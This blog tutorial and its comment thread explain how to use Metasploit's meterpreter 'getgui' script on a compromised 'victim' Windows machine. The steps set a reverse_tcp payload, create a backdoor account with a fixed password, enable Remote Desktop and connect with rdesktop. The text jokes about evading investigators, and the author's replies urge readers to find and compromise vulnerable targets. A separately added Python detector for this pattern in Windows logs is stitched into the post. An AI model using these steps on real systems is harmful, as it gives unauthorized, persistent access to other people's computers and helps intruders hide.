5 Steps to Enable Remote Desktop Using Metasploit Meterpreter


Type : Tutorial

Level : Beginner, Medium

Last year, when I was teaching a computer security class, one student came and asked, "Can you give me a simple tutorial on how to use the command prompt?" I said, "I don't think it can be done in a short course, because to learn the command prompt you should practice every day at first and make it as familiar as your mother tongue." From this situation I know that not everyone knows about the command prompt or anything console-based. How about hacking? Yep, it's the same… sometimes newcomers just follow tutorials without knowing exactly what they are doing.

Today I will write a simple tutorial on how to enable Remote Desktop (which uses the Remote Desktop Protocol on TCP port 3389) when you are already inside a remote system using the Metasploit Framework. This method should be useful if you have limited experience with the command prompt. In this case, we will utilize Carlos Perez's 'getgui' script, which enables Remote Desktop and creates a user account for you to log into it with.

Requirements :

1. Metasploit Framework

2. Backtrack 5 (or another Linux OS)

Step-By-Step :

1. My favourite meterpreter payload is reverse_tcp. If you also like to use reverse_tcp for your payload, you can set it with the command below.

set payload windows/meterpreter/reverse_tcp

2. Inside the meterpreter, execute

meterpreter > run getgui -h


to view the help.

3. To add a user with username valent and password r4h45i4 and then enable the Remote Desktop Service, run:

run getgui -u valent -p r4h45i4


Yep, we have successfully created the user and activated the Remote Desktop Service.

Please note the last line of the output, "For cleanup use command : run multi_console_command….bla…bla….bla"; it will be used after you finish using the Remote Desktop Service of the victim computer.

4. To connect to the victim using remote desktop, we can use the rdesktop program (it's already installed on Backtrack).

rdesktop -u <username>  -p <password> <ip-address-target>


initializing……and then….


5. You should also remember that when you add a user, you are adding a new user on the remote computer. Be wise in using this method, because when you make many changes you will also leave a lot of traces on the remote computer, and they can be tracked by investigators :-) . To clean up the user we created before (you can see it in step 3).
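The traces step 5 refers to can be hunted from the defender's side. The following added example (not part of the original post) correlates account creation, local group membership and a first RDP logon in Windows Security events; the event IDs are those of Windows Vista and later, and the sample records, SIDs, addresses, watched groups and 30-minute window are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample records (not real logs), reduced to a few Windows
# Security event fields. SIDs, times and addresses are made up.
SAMPLE_EVENTS = [
    {"time": "2024-01-10T08:40:00", "id": 4624, "LogonType": 10,
     "TargetUserSid": "S-1-5-21-1-2-3-500", "TargetUserName": "Administrator",
     "IpAddress": "10.0.0.5"},
    {"time": "2024-01-10T09:00:05", "id": 4720,
     "TargetSid": "S-1-5-21-1-2-3-1013", "TargetUserName": "valent"},
    {"time": "2024-01-10T09:00:06", "id": 4732,
     "TargetUserName": "Remote Desktop Users", "MemberSid": "S-1-5-21-1-2-3-1013"},
    {"time": "2024-01-10T09:00:06", "id": 4732,
     "TargetUserName": "Administrators", "MemberSid": "S-1-5-21-1-2-3-1013"},
    {"time": "2024-01-10T09:03:41", "id": 4624, "LogonType": 10,
     "TargetUserSid": "S-1-5-21-1-2-3-1013", "TargetUserName": "valent",
     "IpAddress": "192.0.2.44"},
    {"time": "2024-01-10T11:00:00", "id": 4720,
     "TargetSid": "S-1-5-21-1-2-3-1014", "TargetUserName": "intern"},
    {"time": "2024-01-10T11:05:00", "id": 4624, "LogonType": 2,
     "TargetUserSid": "S-1-5-21-1-2-3-1014", "TargetUserName": "intern",
     "IpAddress": "-"},
]

# Assumption: local groups whose membership makes a new account worth watching.
WATCHED_GROUPS = {"Administrators", "Remote Desktop Users"}

def find_new_account_rdp_chains(events, window=timedelta(minutes=30)):
    """Flag accounts that are created (4720), added to a watched local group
    (4732) and then used for an RDP logon (4624, LogonType 10) within `window`."""
    created, groups, findings = {}, {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:                      # user account created
            created[ev["TargetSid"]] = ts
        elif ev["id"] == 4732 and ev["TargetUserName"] in WATCHED_GROUPS:
            born = created.get(ev["MemberSid"])   # only accounts seen being created
            if born is not None and ts - born <= window:
                groups.setdefault(ev["MemberSid"], set()).add(ev["TargetUserName"])
        elif ev["id"] == 4624 and ev.get("LogonType") == 10:  # RemoteInteractive
            sid = ev["TargetUserSid"]
            if sid in groups and ts - created[sid] <= window:
                findings.append({"account": ev["TargetUserName"], "sid": sid,
                                 "groups": sorted(groups[sid]),
                                 "source_ip": ev["IpAddress"],
                                 "logon_time": ev["time"]})
    return findings

if __name__ == "__main__":
    for finding in find_new_account_rdp_chains(SAMPLE_EVENTS):
        print(finding)
```

The existing administrator's RDP session and the newly created account that only logs on at the console are not flagged; only the create, group-add, RDP-logon chain is.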


Finish…

Hope it's useful for you… any questions? Just drop them in the comment box. :-)

Vishnu Valentino

Computer Security, Blogger

Nothing Secure...

BANDUNG - INDONESIA

CHANGCHUN - CHINA



18 Comments »

  1. Hagai Says:

    Hi,
    I have a beginner's Q. :)
    Where do I find the Meterpreter in BT5?

  2. v4L Says:

    #Hagai
    Firstly, you should exploit a machine first and then set the payload using meterpreter. Please refer to this tutorial http://vishnuvalentino.com/computer/hacking-mozilla-firefox-3-5-to-3-6-nstreerange-vulnerability-using-metasploit/

  3. puppet Says:

    How do we know the username and password of the victim???
    And do we need to add a new user to the victim computer?

  4. v4L Says:

    #puppet
    First of all, you should find a vulnerable target… and then try to compromise it… when you successfully compromise the target, you don't need to input any password or username :-)

  5. mehdi Says:

    I have a problem: Unknown command: rdesktop

  6. v4L Says:

    #mehdi
    Hmm… maybe you don't have rdesktop installed… try to run apt-get install rdesktop.

  7. th3bAdh Says:

    I have a problem with rdesktop: the password was invalid, but I've double-checked the password and am still getting the error.

  8. vir0e5 Says:
  9. v4L Says:

    #th3bAdh
    Hmm… if the password was correct there should be no error like this… maybe the password was empty or there is an issue with keyboard localization..

  10. josh Says:

    I am using the following payload:
     (windows/shell/reverse_tcp):
    but when I run the exploit..
    after the binding, it says "Sending exploit …"
    and then it returns me ….msf  exploit(ms03_026_dcom) > 
    so nothing happens…..you know what could be the possible reason for this?
    Thanks!

  11. v4L Says:

    #josh
    Maybe it means that the target isn't vulnerable.

  12. bagus Says:

    When I write getgui – h run , run the command it says unknown ..
    What should I do?

  13. v4L Says:

    #bagus
    Are you already inside the meterpreter console?

  14. DeusIgni Says:

    Whenever I attempt to create a shell on the target computer, the handler is created on my end, but the connection times out. Why is that? Is it an error on my end?
    -DeusIgni

  15. v4L Says:

    #DeusIgni
    Hmm, maybe the target prevents you from creating it… it doesn't mean that if you got meterpreter, you'll also get the shell… it depends on the vulnerability ranking… FYI the target machine in this tutorial was XP SP0..

  16. DeusIgni Says:

    Is there a way to use this exploit on XP SP3?
    -DeusIgni

